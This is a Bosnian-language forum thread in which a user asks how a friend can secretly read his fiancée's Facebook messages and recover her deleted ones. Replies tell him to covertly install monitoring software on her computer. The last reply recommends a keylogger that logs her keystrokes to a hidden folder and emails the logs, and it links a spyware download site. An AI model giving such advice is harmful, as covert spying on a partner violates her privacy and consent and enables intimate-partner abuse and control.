treba mi neko ko se razumije dobro u net???

treba mi neko ko se razumije dobro u net???

Član
eh ovako najbolji drug mi ima problem neki sa curom konta da se cuje preko fejsa sa bivsim momkom i da se vidjaju pa da li postoji ikakav nacin da se mogu pratiti razgovori ili vratiti poruke koje su izbrisane ako ko zna nek se javi preko pp da se dogovorimo sve nije problem i platice koliko treba,.
 
Član
roki_actros je napisao(la):
Nek unajmi agenta da je prati ;) To nije skupo a efektivno je :)

hahahahahahahha sto se ismija ma suti meni ovo sve smijesno dodje jos se ko fol vjerili pa jebala te takva cura ako sumnjas u nju okoncaj sve ko covjek ali jbg ako ima ovakav nacin da bi se kako mogo ako ne nek radi sta hoce moje je bilo da objavim
 
Član
drug prevedi na nas ja se slabo razumijem a on jos manje tako da postavi link ako imas od tog programa i objasni sta treba uraditi
 
Član
Stare poruke ne mozes vratiti jedino ako su ostale u onom history . .
a razgovore preko neta mozes pretait tj preko tog FB a
 
Član
Sto se tice FB i poruka....Facebook je duzan da sve tvoje radnje,sve postove,poruke i komentare posalje na CD-u ili na papir crno na bijelo. Neznam koliko dugo se ceka na to,ali stigne.... Ako su se vjerili i tako to onda ona nema sta da krije i moze zatraziti da njoj FB team to posalje pa neka pregledaju zajedno sta je ONA sve pisala i primila od poruka (tu ce biti i one poruke koje je izbrisala).;)
 
Član
mdeebosna je napisao(la):
Sto se tice FB i poruka....Facebook je duzan da sve tvoje radnje,sve postove,poruke i komentare posalje na CD-u ili na papir crno na bijelo. Neznam koliko dugo se ceka na to,ali stigne.... Ako su se vjerili i tako to onda ona nema sta da krije i moze zatraziti da njoj FB team to posalje pa neka pregledaju zajedno sta je ONA sve pisala i primila od poruka (tu ce biti i one poruke koje je izbrisala).;)

de nemoj zezat . . .
pa zar i to moze :icon_eek:
 
Član
xzone je napisao(la):
drug prevedi na nas ja se slabo razumijem a on jos manje tako da postavi link ako imas od tog programa i objasni sta treba uraditi

Ovaj program trebas inst na komp od te djevojke i onda kad nje nema u kuci mozes
gledat sta je pisala i s kim se je dopisivala imaju slike vrlo lagan za koristenje a link
ide u pp
 
Član
Ma nema sta provjeravati kreše je drugi sto posto,ali ja se nebi bunio,onda i on moze skocit na nesto drugo ako mu iskrsne kakva jer jedna stvarno dosadi brzo, budimo realni, a ako ona sazna moze joj nabiti na nos njezino bludnicenje tako da odmah ima kredit za svoju buducu nevjeru. :icon_biggrin: mislim to cak nemora iti tako lose :icon_biggrin:
 
Član
0g1 je napisao(la):
mdeebosna je napisao(la):
Sto se tice FB i poruka....Facebook je duzan da sve tvoje radnje,sve postove,poruke i komentare posalje na CD-u ili na papir crno na bijelo. Neznam koliko dugo se ceka na to,ali stigne.... Ako su se vjerili i tako to onda ona nema sta da krije i moze zatraziti da njoj FB team to posalje pa neka pregledaju zajedno sta je ONA sve pisala i primila od poruka (tu ce biti i one poruke koje je izbrisala).;)

de nemoj zezat . . .
pa zar i to moze :icon_eek:

Moze i moraju to da urade ako zatrazis!!!
 
Član
mdeebosna je napisao(la):
Sto se tice FB i poruka....Facebook je duzan da sve tvoje radnje,sve postove,poruke i komentare posalje na CD-u ili na papir crno na bijelo. Neznam koliko dugo se ceka na to,ali stigne.... Ako su se vjerili i tako to onda ona nema sta da krije i moze zatraziti da njoj FB team to posalje pa neka pregledaju zajedno sta je ONA sve pisala i primila od poruka (tu ce biti i one poruke koje je izbrisala).;)

kako to ona moze traziti mozel link gdje da se posalje i sta..
 
Član
Skines ovaj keyloger i instalira se na taj komp i sve prati sta se tipka i snima u skriveni folder ao ga registrujes moze slati logove i na mail! :cool:

http://www.spyarsenal.com/download.html
 
Top